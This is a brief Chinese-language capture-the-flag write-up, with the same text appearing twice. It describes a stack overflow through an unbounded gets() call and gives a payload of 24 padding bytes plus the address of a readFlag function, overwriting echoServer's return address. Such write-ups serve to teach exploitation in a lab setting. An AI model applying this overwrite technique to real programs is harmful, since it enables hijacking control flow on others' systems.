1.丢进IDA分析
发现gets函数没有作长度限制,存在明显的栈溢出
2.发现程序中存在可用于读flag的函数
其地址为0x4444667D
3.覆盖echoServer函数的返回地址为readFlag函数即可
payload = "A"*24 + "\x7d\x66\x44\x44"
1.丢进IDA分析
发现gets函数没有作长度限制,存在明显的栈溢出
2.发现程序中存在可用于读flag的函数
其地址为0x4444667D
3.覆盖echoServer函数的返回地址为readFlag函数即可
payload = "A"*24 + "\x7d\x66\x44\x44"